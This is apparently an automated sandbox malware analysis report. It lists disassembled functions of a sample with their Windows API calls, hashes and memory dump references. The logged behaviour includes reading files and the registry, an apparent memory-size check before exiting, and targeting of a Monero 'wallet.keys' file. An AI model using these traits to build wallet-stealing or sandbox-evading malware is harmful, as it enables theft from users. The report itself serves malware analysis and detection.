Opcode Fuzzy Hash: e2f0783597af5ae27046d1d09121b201b228bdadfd87f9f8acc15fca0bc35383
Instruction Fuzzy Hash: 6C31FC71A40208BADB04FBF0EC96FEE7778AF46340F504528F612A6193DF746905CAA2

Function 000A99C0 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 000A99EC
GetFileSizeEx.KERNEL32(000000FF,?), ref: 000A9A11
LocalAlloc.KERNEL32(00000040,?), ref: 000A9A31
ReadFile.KERNEL32(000000FF,?,00000000,000A148F,00000000), ref: 000A9A5A
LocalFree.KERNEL32(000A148F), ref: 000A9A90
CloseHandle.KERNEL32(000000FF), ref: 000A9A9A

Memory Dump Source

Source File: 00000000.00000002.2237128850.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.2237106103.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000000FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000125000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000128000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000132000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000151000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000018F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000245000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000265000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000026B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000573000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000595000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000005AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237922274.00000000005AC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238075304.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238097881.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_file.jbxd

Yara matches

Similarity

API ID: File$Local$AllocCloseCreateFreeHandleReadSize
String ID:
API String ID: 2311089104-0
Opcode ID: 833cd234dd48255d40f66e7968e850cc029b57755eff46cc972b2a1b5e26193e
Instruction ID: 479c95ce34382e316d1402b730b8ef4b57d81621a1a404cdffdd1ce055c9c434
Opcode Fuzzy Hash: 833cd234dd48255d40f66e7968e850cc029b57755eff46cc972b2a1b5e26193e
Instruction Fuzzy Hash: 7F3116B4A00209EFDF14CF94D889BAEB7F5FF59340F108159E915AB290D774AA41CFA2

Function 000B4780 Relevance: 8.9, APIs: 7, Instructions: 101stringCOMMON

Download Yara Rule

APIs

lstrcat.KERNEL32(?,0139EC28), ref: 000B47DB

Part of subcall function 000B8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 000B8E0B

lstrcat.KERNEL32(?,00000000), ref: 000B4801
lstrcat.KERNEL32(?,?), ref: 000B4820
lstrcat.KERNEL32(?,?), ref: 000B4834
lstrcat.KERNEL32(?,0138B1A8), ref: 000B4847
lstrcat.KERNEL32(?,?), ref: 000B485B
lstrcat.KERNEL32(?,0139E5D8), ref: 000B486F

Part of subcall function 000BA740: lstrcpy.KERNEL32(000C0E17,00000000), ref: 000BA788

Part of subcall function 000B8D90: GetFileAttributesA.KERNEL32(00000000,?,000A1B54,?,?,000C564C,?,?,000C0E1F), ref: 000B8D9F

Part of subcall function 000B4570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 000B4580
Part of subcall function 000B4570: RtlAllocateHeap.NTDLL(00000000), ref: 000B4587
Part of subcall function 000B4570: wsprintfA.USER32 ref: 000B45A6
Part of subcall function 000B4570: FindFirstFileA.KERNEL32(?,?), ref: 000B45BD

Memory Dump Source

Source File: 00000000.00000002.2237128850.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.2237106103.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000000FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000125000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000128000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000132000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000151000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000018F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000245000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000265000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000026B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000573000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000595000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000005AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237922274.00000000005AC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238075304.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238097881.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
String ID:
API String ID: 2540262943-0
Opcode ID: 0641b7001b4b0a71f297676520ce5245e65e0e312af89154fb39aa153b976721
Instruction ID: 57d9df2c19b73ab4ed9918a02d7fcfb73a23b91488d628f4719250aba353a31e
Opcode Fuzzy Hash: 0641b7001b4b0a71f297676520ce5245e65e0e312af89154fb39aa153b976721
Instruction Fuzzy Hash: 2D3192B2940208A7DB10FBB0DCC9EED737CAB48700F444589F31996092EE74A789CB92

Function 000A1220 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 000A123E
__aulldiv.LIBCMT ref: 000A1258
__aulldiv.LIBCMT ref: 000A1266
ExitProcess.KERNEL32 ref: 000A1294

Strings

@, xrefs: 000A1233

Memory Dump Source

Source File: 00000000.00000002.2237128850.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.2237106103.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000000FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000125000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000128000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000132000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000151000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000018F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000245000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000265000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000026B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000573000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000595000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000005AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237922274.00000000005AC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238075304.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238097881.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_file.jbxd

Yara matches

Similarity

API ID: __aulldiv$ExitGlobalMemoryProcessStatus
String ID: @
API String ID: 3404098578-2766056989
Opcode ID: 858dd0b3f3a7ce8969ec3974f75472e69303dc402c0ee1c4e069bc7ff602e8da
Instruction ID: c83dfddd2ceea0076be320dc9e3d4b8b761967bb9432550e325806c9d9b9fcfd
Opcode Fuzzy Hash: 858dd0b3f3a7ce8969ec3974f75472e69303dc402c0ee1c4e069bc7ff602e8da
Instruction Fuzzy Hash: 54016DB0D40308BAEF10DBE0DC8ABDEBBB8AB04701F248059E705BA2C1D774A5418799

Function 6C66C930 Relevance: 7.6, APIs: 5, Instructions: 83memoryCOMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(?), ref: 6C66C947
VirtualAlloc.KERNEL32(?,?,00002000,00000001), ref: 6C66C969
GetSystemInfo.KERNEL32(?), ref: 6C66C9A9
VirtualFree.KERNEL32(00000000,?,00008000), ref: 6C66C9C8
VirtualAlloc.KERNEL32(00000000,?,00002000,00000001), ref: 6C66C9E2

Memory Dump Source

Source File: 00000000.00000002.2269025321.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2269004595.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2269088046.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2269110628.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2269129071.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: Virtual$AllocInfoSystem$Free
String ID:
API String ID: 4191843772-0
Opcode ID: 806fa9ef3eff5ea6525273a450e0815cbe3cf0fefe36be85dbd594e156b38404
Instruction ID: 8beecf542c0bdd91edfb1ad2115f65f53b1c160ab50849b684cb1bda7047f29d
Opcode Fuzzy Hash: 806fa9ef3eff5ea6525273a450e0815cbe3cf0fefe36be85dbd594e156b38404
Instruction Fuzzy Hash: 5221C531741A147BDB14AE67CCC4BAE72B9AB86744F50061AF903A7E80DB60780087AE

Function 000B7E00 Relevance: 7.6, APIs: 5, Instructions: 58registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 000B7E37
RtlAllocateHeap.NTDLL(00000000), ref: 000B7E3E
RegOpenKeyExA.KERNEL32(80000002,0138BC78,00000000,00020119,?), ref: 000B7E5E
RegQueryValueExA.KERNEL32(?,0139E4F8,00000000,00000000,000000FF,000000FF), ref: 000B7E7F
RegCloseKey.ADVAPI32(?), ref: 000B7E92

Memory Dump Source

Source File: 00000000.00000002.2237128850.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.2237106103.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000000FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000125000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000128000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000132000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000151000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000018F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000245000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000265000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000026B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000573000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000595000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000005AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237922274.00000000005AC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238075304.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238097881.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateCloseOpenProcessQueryValue
String ID:
API String ID: 3225020163-0
Opcode ID: ec3fd8722a3eb26e37493c1c9aaa07619bdd44b8772c0bc7713f7ebb447e25bb
Instruction ID: 4c345d6f4c0469c55ffffa9b7db8d813904b5bcdebb0135f472c8d8281e0a80a
Opcode Fuzzy Hash: ec3fd8722a3eb26e37493c1c9aaa07619bdd44b8772c0bc7713f7ebb447e25bb
Instruction Fuzzy Hash: 101151B1A84245EBD710CF94ED89FBFBBB8FB48710F104159F615AB280D77468008BA2

Function 000A12A0 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 000A12B4
RtlAllocateHeap.NTDLL(00000000), ref: 000A12BB
RegOpenKeyExA.KERNEL32(000000FF,?,00000000,00020119,?), ref: 000A12D7
RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 000A12F5
RegCloseKey.ADVAPI32(?), ref: 000A12FF

Memory Dump Source

Source File: 00000000.00000002.2237128850.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.2237106103.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000000FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000125000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000128000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000132000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000151000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000018F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000245000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000265000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000026B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000573000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000595000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000005AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237922274.00000000005AC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238075304.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238097881.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateCloseOpenProcessQueryValue
String ID:
API String ID: 3225020163-0
Opcode ID: a12b86d1adadce757817c78d15dd95289885473e5c6f1f9bfb63669258c49a17
Instruction ID: 300ed3a6ab1aba3b24fefa6c4558baed98ea70bb9245009272f8945a6e16adc9
Opcode Fuzzy Hash: a12b86d1adadce757817c78d15dd95289885473e5c6f1f9bfb63669258c49a17
Instruction Fuzzy Hash: AD0136B5A40208BBDB00DFD0EC8DFAEB7B8EB48701F008155FA059B280D670AA018F51

Function 000AA0A0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116libraryCOMMON

Download Yara Rule

APIs

GetEnvironmentVariableA.KERNEL32(01398820,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,0000FFFF), ref: 000AA0BD
LoadLibraryA.KERNEL32(0139E7D8), ref: 000AA146

Part of subcall function 000BA740: lstrcpy.KERNEL32(000C0E17,00000000), ref: 000BA788

Part of subcall function 000BA820: lstrlen.KERNEL32(000A4F05,?,?,000A4F05,000C0DDE), ref: 000BA82B
Part of subcall function 000BA820: lstrcpy.KERNEL32(000C0DDE,00000000), ref: 000BA885

Part of subcall function 000BA9B0: lstrlen.KERNEL32(?,01398A60,?,\Monero\wallet.keys,000C0E17), ref: 000BA9C5
Part of subcall function 000BA9B0: lstrcpy.KERNEL32(00000000), ref: 000BAA04
Part of subcall function 000BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 000BAA12

Part of subcall function 000BA920: lstrcpy.KERNEL32(00000000,?), ref: 000BA972
Part of subcall function 000BA920: lstrcat.KERNEL32(00000000), ref: 000BA982

Part of subcall function 000BA8A0: lstrcpy.KERNEL32(?,000C0E17), ref: 000BA905

SetEnvironmentVariableA.KERNEL32(01398820,00000000,00000000,?,000C12D8,?,?,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,000C0AFE), ref: 000AA132

Strings

C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;, xrefs: 000AA0B2, 000AA0C6, 000AA0DC

Memory Dump Source

Source File: 00000000.00000002.2237128850.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.2237106103.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000000FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000125000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000128000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000132000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000151000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000018F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000245000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000265000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000026B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000573000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000595000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000005AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237922274.00000000005AC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238075304.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238097881.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
String ID: C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;
API String ID: 2929475105-4027016359
Opcode ID: b3454118068df457db29913edf6c7847fd83ae0f3feba95e6706f3e76e390a22
Instruction ID: 9aa4db8bce1b4981eca713983093819a210f856d6831235848c672e1d9c403b8
Opcode Fuzzy Hash: b3454118068df457db29913edf6c7847fd83ae0f3feba95e6706f3e76e390a22
Instruction Fuzzy Hash: 47412CB1A41244AFCF05DFA4FCD9BEA77B8BB0B301F154118E5069A2A1DB346985CB63

Function 000AA260 Relevance: 6.4, APIs: 4, Instructions: 370filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 000BA740: lstrcpy.KERNEL32(000C0E17,00000000), ref: 000BA788

Part of subcall function 000BA9B0: lstrlen.KERNEL32(?,01398A60,?,\Monero\wallet.keys,000C0E17), ref: 000BA9C5
Part of subcall function 000BA9B0: lstrcpy.KERNEL32(00000000), ref: 000BAA04
Part of subcall function 000BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 000BAA12

Part of subcall function 000BA8A0: lstrcpy.KERNEL32(?,000C0E17), ref: 000BA905

Part of subcall function 000B8B60: GetSystemTime.KERNEL32(000C0E1A,01399EE8,000C05AE,?,?,000A13F9,?,0000001A,000C0E1A,00000000,?,01398A60,?,\Monero\wallet.keys,000C0E17), ref: 000B8B86

Part of subcall function 000BA920: lstrcpy.KERNEL32(00000000,?), ref: 000BA972
Part of subcall function 000BA920: lstrcat.KERNEL32(00000000), ref: 000BA982

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 000AA2E1
lstrlen.KERNEL32(00000000,00000000), ref: 000AA3FF
lstrlen.KERNEL32(00000000), ref: 000AA6BC

Part of subcall function 000BA7A0: lstrcpy.KERNEL32(?,00000000), ref: 000BA7E6

DeleteFileA.KERNEL32(00000000), ref: 000AA743

Memory Dump Source

Source File: 00000000.00000002.2237128850.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.2237106103.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000000FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000125000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000128000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000132000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000151000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000018F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BB000.00000040.00000001.01000000.00000003.sdmpDownload File
